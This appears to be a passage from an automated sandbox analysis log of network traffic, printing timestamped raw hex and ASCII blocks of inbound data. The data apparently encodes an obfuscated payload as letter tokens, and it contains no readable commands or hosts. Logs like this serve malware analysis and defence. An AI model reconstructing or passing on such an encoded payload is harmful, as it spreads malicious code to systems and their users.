                                                                                                2021-10-26 15:35:11 UTC1684INData Raw: 69 20 54 54 69 20 54 54 6e 20 54 53 4f 20 54 54 4d 20 50 53 20 69 55 20 50 53 20 50 69 20 55 69 20 54 54 69 20 50 67 20 54 53 4f 20 54 54 4d 20 54 54 4d 20 67 53 20 70 69 20 70 4f 20 67 55 20 54 6e 20 54 54 6e 20 54 53 4f 20 54 54 4d 20 54 70 4d 20 55 67 20 50 54 20 50 69 20 55 69 20 55 4d 20 54 54 4f 20 54 53 4f 20 54 54 4d 20 55 70 20 69 4f 20 50 53 20 50 69 20 54 50 4d 20 54 54 50 20 54 54 6e 20 54 53 4f 20 54 54 4d 20 50 53 20 69 55 20 50 53 20 50 69 20 55 69 20 54 54 69 20 54 54 6e 20 54 53 4f 20 54 54 4d 20 50 53 20 54 54 4d 20 50 53 20 50 69 20 4d 53 20 54 54 69 20 54 54 6e 20 54 53 4f 20 54 54 4d 20 50 53 20 69 55 20 50 53 20 50 69 20 55 69 20 54 54 69 20 54 54 6e 20 54 53 4f 20 54 54 4d 20 50 53 20 69 55 20 50 53 20 70 70 20 54 6e 4f 20 54 54 50
                                                                                                Data Ascii: i TTi TTn TSO TTM PS iU PS Pi Ui TTi Pg TSO TTM TTM gS pi pO gU Tn TTn TSO TTM TpM Ug PT Pi Ui UM TTO TSO TTM Up iO PS Pi TPM TTP TTn TSO TTM PS iU PS Pi Ui TTi TTn TSO TTM PS TTM PS Pi MS TTi TTn TSO TTM PS iU PS Pi Ui TTi TTn TSO TTM PS iU PS pp TnO TTP
                                                                                                2021-10-26 15:35:11 UTC1685INData Raw: 20 69 55 20 67 67 20 70 20 55 50 20 54 54 69 20 54 4d 70 20 54 53 4f 20 54 54 4d 20 50 53 20 50 67 20 50 53 20 50 69 20 70 4f 20 54 4d 20 54 54 67 20 54 53 4f 20 54 54 4d 20 50 69 20 4f 50 20 54 67 20 50 69 20 55 69 20 54 4d 53 20 4f 50 20 54 53 4f 20 4f 4f 20 4d 20 69 4f 20 50 53 20 70 54 20 55 69 20 54 54 69 20 54 54 6e 20 54 53 6e 20 54 54 4d 20 50 53 20 67 67 20 6e 70 20 50 54 20 55 69 20 54 54 69 20 54 54 67 20 4d 20 69 55 20 50 53 20 69 55 20 50 70 20 4d 55 20 55 69 20 54 54 67 20 70 4f 20 54 53 67 20 54 54 4d 20 70 54 20 69 55 20 50 53 20 50 69 20 55 69 20 54 54 69 20 54 54 6e 20 54 53 4f 20 54 54 69 20 69 54 20 69 70 20 67 54 20 69 4f 20 54 54 69 20 4f 53 20 50 4d 20 54 53 4f 20 54 54 4d 20 50 70 20 4d 70 20 4d 53 20 4d 4f 20 54 70 67 20 54 54 69
                                                                                                Data Ascii: iU gg p UP TTi TMp TSO TTM PS Pg PS Pi pO TM TTg TSO TTM Pi OP Tg Pi Ui TMS OP TSO OO M iO PS pT Ui TTi TTn TSn TTM PS gg np PT Ui TTi TTg M iU PS iU Pp MU Ui TTg pO TSg TTM pT iU PS Pi Ui TTi TTn TSO TTi iT ip gT iO TTi OS PM TSO TTM Pp Mp MS MO Tpg TTi
                                                                                                2021-10-26 15:35:11 UTC1687INData Raw: 20 4d 4f 20 70 4d 20 54 53 4f 20 54 54 4d 20 50 70 20 4d 69 20 50 69 20 50 69 20 55 69 20 55 4f 20 54 54 53 20 70 69 20 54 54 55 20 4d 53 20 4d 67 6e 20 6e 55 20 50 69 20 55 69 20 54 54 69 20 54 4d 6e 20 6e 53 20 54 67 70 20 6e 54 20 54 55 53 20 50 53 20 50 69 20 55 50 20 55 6e 20 55 55 20 54 53 50 20 55 70 20 67 70 20 4d 6e 20 69 69 20 54 4f 20 6e 6e 20 4f 50 20 4f 55 20 6e 50 20 55 55 20 54 4d 70 20 69 55 20 50 53 20 70 53 20 4f 4d 20 4d 4f 20 50 70 20 54 53 4f 20 54 54 4d 20 50 70 20 67 70 20 4d 53 69 20 50 50 20 70 70 20 54 69 53 20 54 54 70 20 54 4d 67 20 54 69 4d 20 69 4f 20 4d 6e 20 69 4f 20 50 55 20 54 4d 6e 20 54 69 4f 20 54 67 4f 20 54 4d 69 20 55 70 20 54 55 20 54 6e 70 20 54 55 20 4d 67 53 20 6e 69 20 4f 53 20 54 67 55 20 54 53 4f 20 54 54 4d
                                                                                                Data Ascii: MO pM TSO TTM Pp Mi Pi Pi Ui UO TTS pi TTU MS Mgn nU Pi Ui TTi TMn nS Tgp nT TUS PS Pi UP Un UU TSP Up gp Mn ii TO nn OP OU nP UU TMp iU PS pS OM MO Pp TSO TTM Pp gp MSi PP pp TiS TTp TMg TiM iO Mn iO PU TMn TiO TgO TMi Up TU Tnp TU MgS ni OS TgU TSO TTM
                                                                                                2021-10-26 15:35:11 UTC1688INData Raw: 20 67 4f 20 69 67 20 54 4d 54 20 54 4d 50 20 55 67 20 70 4f 20 67 69 20 50 53 20 69 55 20 50 70 20 67 53 20 6e 20 54 54 69 20 54 54 6e 20 54 53 67 20 4f 53 20 4d 53 20 4d 6e 20 4d 4d 4d 20 54 70 20 54 4d 6e 20 54 50 6e 20 54 54 6e 20 54 53 4f 20 54 54 4d 20 67 67 20 53 20 69 4f 20 50 69 20 4f 54 20 54 54 69 20 54 54 6e 20 54 53 4f 20 54 4d 69 20 50 53 20 69 55 20 67 50 20 50 4d 20 6e 55 20 54 53 67 20 55 55 20 54 53 70 20 55 70 20 4d 70 20 54 53 53 20 50 53 20 50 69 20 4f 69 20 55 55 20 55 67 20 6e 53 20 54 67 50 20 50 53 20 67 50 20 4d 20 50 50 20 55 69 20 54 4d 54 20 54 54 6e 20 54 53 4f 20 54 54 4d 20 70 67 20 69 55 20 50 53 20 67 4f 20 54 67 4d 20 54 54 70 20 54 54 6e 20 54 53 4f 20 54 54 69 20 4d 70 20 54 54 55 20 50 53 20 50 69 20 4f 69 20 55 55 20
                                                                                                Data Ascii: gO ig TMT TMP Ug pO gi PS iU Pp gS n TTi TTn TSg OS MS Mn MMM Tp TMn TPn TTn TSO TTM gg S iO Pi OT TTi TTn TSO TMi PS iU gP PM nU TSg UU TSp Up Mp TSS PS Pi Oi UU Ug nS TgP PS gP M PP Ui TMT TTn TSO TTM pg iU PS gO TgM TTp TTn TSO TTi Mp TTU PS Pi Oi UU
                                                                                                2021-10-26 15:35:11 UTC1689INData Raw: 4f 20 54 54 55 20 4d 69 20 67 50 20 4d 20 50 67 20 55 69 20 70 54 20 54 54 6e 20 54 53 4f 20 54 54 4d 20 67 69 20 69 55 20 50 53 20 67 4f 20 55 70 20 54 53 53 20 4d 67 4f 20 4d 53 20 70 70 20 50 53 20 69 55 20 50 54 20 6e 54 20 54 53 4d 20 54 54 69 20 54 54 6e 20 54 53 55 20 54 53 69 20 67 54 20 4d 20 4d 53 20 50 4d 20 70 6e 20 4d 67 4d 20 54 20 54 53 67 20 54 54 4d 20 50 53 20 69 67 20 69 67 20 4d 6e 20 54 4d 50 20 55 69 20 54 54 50 20 54 54 50 20 4f 67 20 4d 54 20 4d 4d 20 50 67 20 54 55 4d 20 4f 4f 20 54 54 69 20 54 54 6e 20 54 53 50 20 54 69 20 50 20 69 55 20 50 53 20 50 53 20 54 4d 69 20 54 55 20 54 54 70 20 54 53 4f 20 54 54 55 20 54 6e 55 20 70 20 50 53 20 50 69 20 55 53 20 4f 53 20 54 55 20 54 53 4f 20 54 54 4d 20 50 4d 20 4d 69 20 54 55 20 50 69
                                                                                                Data Ascii: O TTU Mi gP M Pg Ui pT TTn TSO TTM gi iU PS gO Up TSS MgO MS pp PS iU PT nT TSM TTi TTn TSU TSi gT M MS PM pn MgM T TSg TTM PS ig ig Mn TMP Ui TTP TTP Og MT MM Pg TUM OO TTi TTn TSP Ti P iU PS PS TMi TU TTp TSO TTU TnU p PS Pi US OS TU TSO TTM PM Mi TU Pi
                                                                                                2021-10-26 15:35:11 UTC1691INData Raw: 53 20 54 6e 54 20 54 54 69 20 54 54 6e 20 54 53 6e 20 4f 6e 20 50 67 20 6e 50 20 67 50 20 50 69 20 55 69 20 54 54 55 20 4d 69 4f 20 67 6e 20 54 54 4d 20 50 53 20 69 4f 20 4d 70 20 54 53 70 20 55 69 20 54 54 69 20 54 4d 6e 20 70 4f 20 54 4f 6e 20 50 53 20 69 55 20 50 4d 20 67 4f 20 55 67 20 4f 20 54 53 67 20 54 53 4f 20 54 54 4d 20 50 69 20 4d 55 20 50 4d 20 67 67 20 4d 54 4d 20 54 4d 53 20 54 54 6e 20 54 53 4f 20 54 54 70 20 67 50 20 50 50 20 6e 67 20 67 50 20 55 69 20 54 54 69 20 54 54 67 20 70 69 20 54 54 69 20 4d 50 20 50 20 67 50 20 69 4f 20 69 6e 20 54 53 67 20 54 54 6e 20 54 53 4f 20 54 54 70 20 4f 67 20 70 20 50 53 20 50 69 20 55 4d 20 54 6e 4d 20 55 4d 20 6e 4d 20 55 55 20 54 4d 70 20 69 55 20 50 53 20 70 53 20 6e 54 20 54 4d 4d 20 54 53 53 20 54
                                                                                                Data Ascii: S TnT TTi TTn TSn On Pg nP gP Pi Ui TTU MiO gn TTM PS iO Mp TSp Ui TTi TMn pO TOn PS iU PM gO Ug O TSg TSO TTM Pi MU PM gg MTM TMS TTn TSO TTp gP PP ng gP Ui TTi TTg pi TTi MP P gP iO in TSg TTn TSO TTp Og p PS Pi UM TnM UM nM UU TMp iU PS pS nT TMM TSS T
                                                                                                2021-10-26 15:35:11 UTC1692INData Raw: 55 20 54 50 67 20 50 69 20 55 69 20 54 54 50 20 55 20 54 4d 50 20 54 54 4d 20 50 53 20 50 4d 20 50 55 20 50 4d 20 55 67 20 54 53 6e 20 69 50 20 4d 69 6e 20 4f 20 54 55 20 69 55 20 50 53 20 50 50 20 67 6e 20 55 4d 20 54 54 6e 20 54 53 4f 20 54 54 67 20 6e 4f 20 67 69 20 50 53 20 50 69 20 55 53 20 54 4d 4d 20 54 54 4f 20 54 53 70 20 54 53 70 20 54 53 70 20 54 6e 53 20 6e 53 20 70 53 20 55 69 20 54 54 69 20 54 54 53 20 54 70 20 4f 4f 20 50 53 20 69 55 20 50 69 20 70 4d 20 4f 4d 20 4f 20 54 53 4d 20 54 53 4f 20 54 54 4d 20 50 69 20 4d 69 20 55 4d 20 50 50 20 55 69 20 54 54 70 20 55 20 54 4d 54 20 54 54 4d 20 50 53 20 50 4d 20 6e 70 20 54 4d 20 55 69 20 54 54 69 20 54 54 67 20 54 53 54 20 67 54 20 55 50 20 69 55 20 50 53 20 70 53 20 55 4d 20 54 4d 4d 20 4d 70
                                                                                                Data Ascii: U TPg Pi Ui TTP U TMP TTM PS PM PU PM Ug TSn iP Min O TU iU PS PP gn UM TTn TSO TTg nO gi PS Pi US TMM TTO TSp TSp TSp TnS nS pS Ui TTi TTS Tp OO PS iU Pi pM OM O TSM TSO TTM Pi Mi UM PP Ui TTp U TMT TTM PS PM np TM Ui TTi TTg TST gT UP iU PS pS UM TMM Mp
                                                                                                2021-10-26 15:35:11 UTC1693INData Raw: 20 50 4d 20 69 55 20 54 55 54 20 50 69 20 55 69 20 54 54 69 20 4f 6e 20 54 53 4f 20 54 54 4d 20 67 50 20 50 53 20 67 6e 20 54 70 6e 20 70 70 20 4f 69 20 4f 69 20 6e 50 20 54 54 50 20 54 55 55 20 55 4f 20 67 70 20 4d 70 20 54 54 50 20 55 69 20 54 54 69 20 54 54 69 20 54 4d 67 20 54 53 70 20 50 69 20 69 6e 20 54 54 53 20 50 67 20 54 70 53 20 4f 55 20 70 69 20 54 53 4f 20 4d 53 20 50 53 20 67 70 20 54 70 6e 20 55 70 20 54 53 70 20 4d 4d 55 20 54 54 50 20 54 55 20 55 4d 20 50 70 20 69 67 20 55 69 20 54 4d 20 54 4d 6e 20 4f 4f 20 54 4d 70 20 54 54 70 20 67 70 20 67 50 20 50 50 20 4d 4f 20 4d 6e 20 54 4d 53 20 4f 69 20 54 4f 53 20 54 4d 67 20 4d 50 20 4d 67 54 20 70 4d 20 4d 4f 20 54 55 54 20 4f 4f 20 54 54 4d 20 54 4d 4d 20 69 6e 20 67 54 20 67 6e 20 50 4f 20
                                                                                                Data Ascii: PM iU TUT Pi Ui TTi On TSO TTM gP PS gn Tpn pp Oi Oi nP TTP TUU UO gp Mp TTP Ui TTi TTi TMg TSp Pi in TTS Pg TpS OU pi TSO MS PS gp Tpn Up TSp MMU TTP TU UM Pp ig Ui TM TMn OO TMp TTp gp gP PP MO Mn TMS Oi TOS TMg MP MgT pM MO TUT OO TTM TMM in gT gn PO
                                                                                                2021-10-26 15:35:11 UTC1695INData Raw: 4d 55 20 55 70 20 54 54 54 20 54 53 50 20 70 69 20 4f 55 20 4d 53 20 6e 50 20 69 4d 20 50 69 20 55 69 20 54 54 55 20 54 54 55 20 54 4d 53 20 54 53 70 20 67 54 20 50 55 20 4d 53 20 55 4f 20 70 54 20 54 54 69 20 54 54 6e 20 54 53 67 20 4f 53 20 4d 53 20 4d 6e 20 4d 4d 4d 20 54 70 20 54 4d 6e 20 54 67 69 20 54 54 55 20 4f 67 20 54 4d 4d 20 50 53 20 4d 67 20 50 53 20 50 69 20 55 69 20 54 54 69 20 54 54 6e 20 54 53 4f 20 54 54 4d 20 69 55 20 69 54 20 69 54 20 4d 6e 20 4f 69 20 55 69 20 54 69 20 54 54 70 20 54 54 4d 20 50 53 20 50 4d 20 67 54 20 69 55 20 54 4d 6e 20 54 54 67 20 55 67 20 6e 53 20 54 67 4d 20 4d 69 20 50 53 20 69 53 20 69 69 20 54 4d 54 20 54 4d 70 20 55 67 20 4d 4d 20 54 53 50 20 50 53 20 69 55 20 50 69 20 55 4f 20 70 4d 20 54 54 69 20 54 54 6e
                                                                                                Data Ascii: MU Up TTT TSP pi OU MS nP iM Pi Ui TTU TTU TMS TSp gT PU MS UO pT TTi TTn TSg OS MS Mn MMM Tp TMn Tgi TTU Og TMM PS Mg PS Pi Ui TTi TTn TSO TTM iU iT iT Mn Oi Ui Ti TTp TTM PS PM gT iU TMn TTg Ug nS TgM Mi PS iS ii TMT TMp Ug MM TSP PS iU Pi UO pM TTi TTn
                                                                                                2021-10-26 15:35:11 UTC1696INData Raw: 67 54 20 69 55 20 54 4d 6e 20 54 54 67 20 55 67 20 6e 53 20 54 67 4d 20 4d 69 20 50 53 20 69 4d 20 69 4d 20 54 4d 54 20 54 4d 70 20 55 67 20 4d 4d 20 54 53 70 20 50 53 20 69 55 20 50 69 20 55 4f 20 67 70 20 54 54 69 20 54 54 6e 20 54 53 67 20 4f 53 20 4d 53 20 4d 6e 20 54 4f 4d 20 50 69 20 55 6e 20 70 70 20 54 4d 6e 20 54 53 4f 20 55 6e 20 50 53 20 69 55 20 50 53 20 50 69 20 55 69 20 54 54 69 20 54 54 6e 20 54 54 54 20 54 53 67 20 69 53 20 4d 4f 20 50 70 20 54 70 20 69 6e 20 54 53 69 20 54 54 6e 20 54 53 4f 20 54 54 70 20 67 54 20 50 69 20 4d 50 20 50 67 20 54 54 69 20 55 4f 20 54 4d 4f 20 6e 54 20 54 54 69 20 69 53 20 69 69 20 67 54 20 50 55 20 54 54 69 20 4f 20 54 54 54 20 54 53 4f 20 54 54 4d 20 50 69 20 4f 50 20 70 6e 20 50 69 20 55 69 20 54 4d 53 20
                                                                                                Data Ascii: gT iU TMn TTg Ug nS TgM Mi PS iM iM TMT TMp Ug MM TSp PS iU Pi UO gp TTi TTn TSg OS MS Mn TOM Pi Un pp TMn TSO Un PS iU PS Pi Ui TTi TTn TTT TSg iS MO Pp Tp in TSi TTn TSO TTp gT Pi MP Pg TTi UO TMO nT TTi iS ii gT PU TTi O TTT TSO TTM Pi OP pn Pi Ui TMS
                                                                                                2021-10-26 15:35:11 UTC1697INData Raw: 67 6e 20 50 53 20 69 55 20 50 4d 20 4d 55 20 55 69 20 4f 6e 20 70 4f 20 54 53 50 20 54 54 4d 20 54 70 4f 20 69 55 20 50 53 20 50 69 20 6e 70 20 54 54 69 20 54 54 6e 20 54 4d 69 20 54 53 50 20 54 4f 54 20 54 67 4f 20 50 53 20 50 69 20 55 50 20 54 53 55 20 6e 4f 20 54 55 20 54 54 4d 20 50 53 20 69 55 20 4d 53 20 69 55 20 70 70 20 54 70 4d 20 54 53 53 20 54 53 4f 20 54 54 4d 20 50 54 20 4d 69 20 54 54 70 20 50 69 20 55 69 20 54 4d 53 20 4d 54 50 20 54 53 6e 20 54 53 67 20 4d 4d 70 20 67 4d 20 50 53 20 50 69 20 55 50 20 4f 53 20 50 54 20 54 53 4f 20 54 54 4d 20 50 70 20 54 69 70 20 50 4d 20 69 70 20 54 67 4d 20 54 4d 50 20 54 54 6e 20 54 53 4f 20 54 54 67 20 4d 70 20 54 54 55 20 50 53 20 50 69 20 4f 69 20 4d 53 55 20 54 54 50 20 54 54 55 20 4f 67 20 54 53 6e
                                                                                                Data Ascii: gn PS iU PM MU Ui On pO TSP TTM TpO iU PS Pi np TTi TTn TMi TSP TOT TgO PS Pi UP TSU nO TU TTM PS iU MS iU pp TpM TSS TSO TTM PT Mi TTp Pi Ui TMS MTP TSn TSg MMp gM PS Pi UP OS PT TSO TTM Pp Tip PM ip TgM TMP TTn TSO TTg Mp TTU PS Pi Oi MSU TTP TTU Og TSn
                                                                                                2021-10-26 15:35:11 UTC1699INData Raw: 55 69 20 54 53 50 20 54 54 6e 20 54 53 4f 20 4f 6e 20 69 55 20 70 6e 20 6e 4d 20 50 69 20 55 69 20 54 4d 53 20 54 54 53 20 70 69 20 54 4d 67 20 4d 53 20 50 50 20 4f 67 20 6e 50 20 55 69 20 54 54 69 20 54 4d 6e 20 70 69 20 54 54 4f 20 4d 50 20 50 54 20 50 6e 20 4d 4f 20 54 70 6e 20 54 53 53 20 4f 50 20 54 53 70 20 67 54 20 6e 55 20 69 55 20 50 53 20 70 53 20 55 6e 20 4f 4d 20 54 54 4f 20 54 4d 67 20 4f 53 20 50 67 20 4f 50 20 6e 67 20 50 69 20 55 69 20 54 4d 53 20 54 53 69 20 70 69 20 54 53 4f 20 4d 53 20 50 70 20 4d 70 20 55 6e 20 55 50 20 54 54 69 20 54 54 50 20 54 54 70 20 4f 67 20 67 70 20 4d 4d 20 50 55 20 55 4f 20 69 50 20 54 54 69 20 54 54 6e 20 54 53 67 20 54 54 55 20 50 69 20 67 55 20 4d 70 20 6e 4d 20 55 69 20 54 54 69 20 54 4d 6e 20 54 4d 67 20
                                                                                                Data Ascii: Ui TSP TTn TSO On iU pn nM Pi Ui TMS TTS pi TMg MS PP Og nP Ui TTi TMn pi TTO MP PT Pn MO Tpn TSS OP TSp gT nU iU PS pS Un OM TTO TMg OS Pg OP ng Pi Ui TMS TSi pi TSO MS Pp Mp Un UP TTi TTP TTp Og gp MM PU UO iP TTi TTn TSg TTU Pi gU Mp nM Ui TTi TMn TMg
                                                                                                2021-10-26 15:35:11 UTC1700INData Raw: 20 67 6e 20 54 53 53 20 54 54 4f 20 54 54 6e 20 70 4f 20 54 54 4d 20 50 53 20 69 55 20 69 50 20 50 69 20 55 69 20 4f 4f 20 54 54 4f 20 54 54 70 20 54 53 69 20 70 50 20 6e 53 20 50 53 20 50 69 20 4f 69 20 54 53 55 20 55 55 20 54 54 4f 20 55 70 20 50 4d 20 50 4d 20 4f 67 20 54 55 67 20 55 69 20 54 54 69 20 54 4d 6e 20 54 53 6e 20 54 54 50 20 67 70 20 50 54 20 54 55 55 20 54 4d 4f 20 50 4f 20 54 53 20 54 54 6e 20 54 53 4f 20 54 4d 4d 20 50 4d 20 4f 50 20 6e 50 20 50 69 20 55 69 20 54 4d 53 20 4f 50 20 54 53 67 20 4f 54 20 4d 54 69 20 50 54 20 4d 20 70 67 20 55 69 20 50 53 20 54 54 6e 20 54 53 4f 20 54 54 4d 20 50 53 20 69 55 20 50 53 20 50 69 20 55 70 20 4f 53 20 50 4d 20 54 53 4f 20 54 54 4d 20 50 70 20 50 53 20 69 55 20 54 4f 20 54 6e 53 20 54 54 6e 20 67
                                                                                                Data Ascii: gn TSS TTO TTn pO TTM PS iU iP Pi Ui OO TTO TTp TSi pP nS PS Pi Oi TSU UU TTO Up PM PM Og TUg Ui TTi TMn TSn TTP gp PT TUU TMO PO TS TTn TSO TMM PM OP nP Pi Ui TMS OP TSg OT MTi PT M pg Ui PS TTn TSO TTM PS iU PS Pi Up OS PM TSO TTM Pp PS iU TO TnS TTn g
                                                                                                2021-10-26 15:35:11 UTC1701INData Raw: 20 4f 50 20 54 54 54 20 54 53 67 20 67 70 20 4d 55 20 67 70 20 54 70 20 54 54 69 20 54 54 4d 20 54 69 20 6e 50 20 54 54 4d 20 50 53 20 50 4d 20 67 70 20 50 4d 20 69 6e 20 55 70 20 54 54 6e 20 54 53 4f 20 54 54 70 20 4f 67 20 54 55 67 20 50 53 20 50 69 20 4f 69 20 55 69 20 4f 50 20 54 70 20 55 50 20 50 53 20 69 55 20 50 69 20 4d 4f 20 54 6e 6e 20 54 54 69 20 54 54 55 20 4f 67 20 54 4d 54 20 50 53 20 4d 4d 20 50 53 20 50 69 20 55 69 20 54 54 69 20 54 54 6e 20 54 53 4f 20 54 54 4d 20 69 55 20 6e 50 20 4d 67 20 50 69 20 55 69 20 54 54 55 20 55 55 20 54 53 55 20 4f 53 20 69 55 20 67 55 20 69 53 20 4d 6e 20 70 4f 20 55 69 20 55 67 20 54 54 54 20 54 54 20 4d 53 20 69 55 20 50 53 20 50 53 20 70 50 20 54 53 67 20 4d 70 20 4d 67 69 20 54 54 4d 20 50 53 20 50 55 20
                                                                                                Data Ascii: OP TTT TSg gp MU gp Tp TTi TTM Ti nP TTM PS PM gp PM in Up TTn TSO TTp Og TUg PS Pi Oi Ui OP Tp UP PS iU Pi MO Tnn TTi TTU Og TMT PS MM PS Pi Ui TTi TTn TSO TTM iU nP Mg Pi Ui TTU UU TSU OS iU gU iS Mn pO Ui Ug TTT TT MS iU PS PS pP TSg Mp Mgi TTM PS PU
                                                                                                2021-10-26 15:35:11 UTC1703INData Raw: 67 4f 20 54 53 4f 20 54 54 4d 20 50 70 20 4f 50 20 4f 6e 20 50 69 20 55 69 20 54 4d 53 20 55 4f 20 54 54 54 20 54 6e 69 20 54 54 67 20 50 53 20 6e 67 20 67 54 20 55 69 20 54 54 69 20 54 54 67 20 54 54 53 20 54 54 70 20 4d 70 20 4f 55 20 50 53 20 50 69 20 4f 69 20 4d 4f 20 4d 50 54 20 54 53 4f 20 54 54 4d 20 50 70 20 4d 67 55 20 69 54 20 50 4d 20 69 6e 20 4f 54 20 54 54 6e 20 54 53 4f 20 54 54 70 20 69 4f 20 50 4d 20 4d 70 20 54 53 53 20 55 69 20 54 54 69 20 54 4d 6e 20 4d 20 4d 50 50 20 50 53 20 69 55 20 50 70 20 4d 67 4d 20 55 67 20 54 54 70 20 4f 67 20 4d 67 54 20 54 54 4d 20 50 53 20 50 55 20 4d 67 55 20 50 4d 20 69 6e 20 4f 53 20 54 54 6e 20 54 53 4f 20 54 54 70 20 67 53 20 70 53 20 69 55 20 6e 6e 20 54 4d 69 20 54 54 69 20 54 54 6e 20 54 53 50 20 54
                                                                                                Data Ascii: gO TSO TTM Pp OP On Pi Ui TMS UO TTT Tni TTg PS ng gT Ui TTi TTg TTS TTp Mp OU PS Pi Oi MO MPT TSO TTM Pp MgU iT PM in OT TTn TSO TTp iO PM Mp TSS Ui TTi TMn M MPP PS iU Pp MgM Ug TTp Og MgT TTM PS PU MgU PM in OS TTn TSO TTp gS pS iU nn TMi TTi TTn TSP T
                                                                                                2021-10-26 15:35:11 UTC1704INData Raw: 20 4f 53 20 4d 4d 6e 20 54 53 4f 20 54 54 4d 20 50 70 20 67 67 20 50 4d 20 55 4f 20 54 4f 50 20 54 54 69 20 54 54 6e 20 54 53 67 20 4f 55 20 50 54 20 4d 69 20 54 6e 53 20 50 69 20 55 69 20 54 4d 53 20 55 55 20 54 6e 69 20 54 4d 53 20 4f 67 20 54 70 4f 20 50 53 20 50 69 20 4f 69 20 54 4d 53 20 54 6e 54 20 54 53 70 20 54 4d 54 20 4d 70 20 54 55 70 20 50 53 20 50 69 20 4f 69 20 54 6e 69 20 54 54 50 20 6e 54 20 54 54 67 20 67 69 20 69 55 20 50 53 20 50 4d 20 55 69 20 54 53 67 20 54 54 6e 20 54 54 20 54 54 20 50 53 20 50 50 20 50 53 20 50 69 20 55 69 20 54 54 69 20 54 53 4d 20 4f 67 20 54 54 69 20 50 53 20 69 6e 20 50 53 20 50 69 20 55 69 20 55 6e 20 54 54 6e 20 54 53 4f 20 4f 6e 20 69 55 20 6e 50 20 4d 6e 20 50 69 20 55 69 20 54 54 55 20 4d 70 20 4d 69 6e 20
                                                                                                Data Ascii: OS MMn TSO TTM Pp gg PM UO TOP TTi TTn TSg OU PT Mi TnS Pi Ui TMS UU Tni TMS Og TpO PS Pi Oi TMS TnT TSp TMT Mp TUp PS Pi Oi Tni TTP nT TTg gi iU PS PM Ui TSg TTn TT TT PS PP PS Pi Ui TTi TSM Og TTi PS in PS Pi Ui Un TTn TSO On iU nP Mn Pi Ui TTU Mp Min
                                                                                                2021-10-26 15:35:11 UTC1705INData Raw: 54 69 20 54 54 6e 20 54 54 53 20 70 69 20 50 69 20 69 55 20 6e 6e 20 50 69 20 55 69 20 54 54 69 20 54 54 6e 20 54 53 4f 20 54 54 4d 20 50 53 20 4d 69 20 54 55 67 20 50 69 20 55 69 20 54 54 70 20 54 54 54 20 70 69 20 53 20 4d 53 20 6e 55 20 54 54 67 20 50 69 20 55 69 20 54 54 55 20 4f 6e 20 54 69 6e 20 54 54 55 20 54 50 53 20 69 55 20 50 53 20 69 55 20 67 4f 20 4d 53 6e 20 54 54 70 20 54 53 4f 20 54 54 55 20 4f 67 20 4f 54 20 50 54 20 50 69 20 55 4d 20 54 4d 20 50 69 20 54 53 4f 20 54 54 4d 20 50 69 20 67 70 20 4d 53 69 20 69 55 20 4d 69 54 20 54 54 69 20 54 54 6e 20 54 53 6e 20 67 20 54 67 50 20 69 4f 20 50 53 20 69 55 20 50 4f 20 4d 4f 20 54 54 70 20 54 53 4f 20 54 54 55 20 6e 70 20 54 54 50 20 50 53 20 50 69 20 55 53 20 54 53 4d 20 54 67 4f 20 54 53 6e
                                                                                                Data Ascii: Ti TTn TTS pi Pi iU nn Pi Ui TTi TTn TSO TTM PS Mi TUg Pi Ui TTp TTT pi S MS nU TTg Pi Ui TTU On Tin TTU TPS iU PS iU gO MSn TTp TSO TTU Og OT PT Pi UM TM Pi TSO TTM Pi gp MSi iU MiT TTi TTn TSn g TgP iO PS iU PO MO TTp TSO TTU np TTP PS Pi US TSM TgO TSn
                                                                                                2021-10-26 15:35:11 UTC1707INData Raw: 20 69 55 20 50 70 20 69 69 20 54 4d 54 20 55 55 20 55 67 20 6e 6e 20 4d 20 54 55 20 4d 4d 69 20 69 69 20 67 53 20 54 6e 54 20 54 54 69 20 54 54 6e 20 54 53 6e 20 4f 55 20 50 53 20 4d 69 20 54 70 70 20 50 69 20 55 69 20 54 4d 53 20 54 53 67 20 54 53 4f 20 55 55 20 54 70 6e 20 69 55 20 50 53 20 70 53 20 54 4d 69 20 67 4d 20 54 54 6e 20 54 53 4f 20 54 4d 4d 20 4d 70 20 54 50 6e 20 50 53 20 50 69 20 4f 69 20 4f 53 20 54 4f 4d 20 54 53 4f 20 54 54 4d 20 50 4d 20 4d 6e 20 69 4f 20 70 53 20 54 4d 6e 20 54 70 70 20 54 53 67 20 54 53 55 20 55 55 20 54 6e 53 20 69 55 20 50 53 20 70 53 20 54 4d 54 20 54 6e 55 20 54 6e 54 20 4f 4f 20 4f 55 20 50 54 20 4d 53 70 20 67 70 20 67 70 20 55 69 20 54 54 69 20 54 54 53 20 4d 20 54 4f 20 50 53 20 69 55 20 50 70 20 4d 67 69 20
                                                                                                Data Ascii: iU Pp ii TMT UU Ug nn M TU MMi ii gS TnT TTi TTn TSn OU PS Mi Tpp Pi Ui TMS TSg TSO UU Tpn iU PS pS TMi gM TTn TSO TMM Mp TPn PS Pi Oi OS TOM TSO TTM PM Mn iO pS TMn Tpp TSg TSU UU TnS iU PS pS TMT TnU TnT OO OU PT MSp gp gp Ui TTi TTS M TO PS iU Pp Mgi
                                                                                                2021-10-26 15:35:11 UTC1708INData Raw: 4d 70 20 50 69 20 55 69 20 54 54 4d 20 54 54 6e 20 54 4f 20 54 54 4d 20 54 54 4d 20 4d 69 53 20 50 53 20 50 70 20 55 69 20 54 54 69 20 54 54 6e 20 54 53 4f 20 54 54 69 20 50 53 20 4d 50 69 20 50 53 20 4d 4f 20 54 6e 67 20 54 54 69 20 54 4d 67 20 54 53 4f 20 54 54 4d 20 50 53 20 69 55 20 50 53 20 50 69 20 54 54 69 20 54 54 69 20 54 50 53 20 54 53 53 20 54 54 67 20 54 55 20 54 54 55 20 50 53 20 50 69 20 55 50 20 54 53 50 20 70 4f 20 54 54 53 20 54 54 4d 20 54 70 69 20 69 55 20 50 53 20 50 69 20 54 4d 50 20 54 54 69 20 54 54 6e 20 54 4d 69 20 54 69 20 6e 4f 20 69 55 20 50 53 20 50 53 20 54 54 70 20 54 70 20 55 50 20 54 55 4f 20 54 54 53 20 4d 70 20 4d 53 6e 20 50 53 20 50 69 20 55 4d 20 4f 53 20 4d 4d 54 20 54 53 4f 20 54 54 4d 20 50 70 20 69 54 20 67 54 20
                                                                                                Data Ascii: Mp Pi Ui TTM TTn TO TTM TTM MiS PS Pp Ui TTi TTn TSO TTi PS MPi PS MO Tng TTi TMg TSO TTM PS iU PS Pi TTi TTi TPS TSS TTg TU TTU PS Pi UP TSP pO TTS TTM Tpi iU PS Pi TMP TTi TTn TMi Ti nO iU PS PS TTp Tp UP TUO TTS Mp MSn PS Pi UM OS MMT TSO TTM Pp iT gT
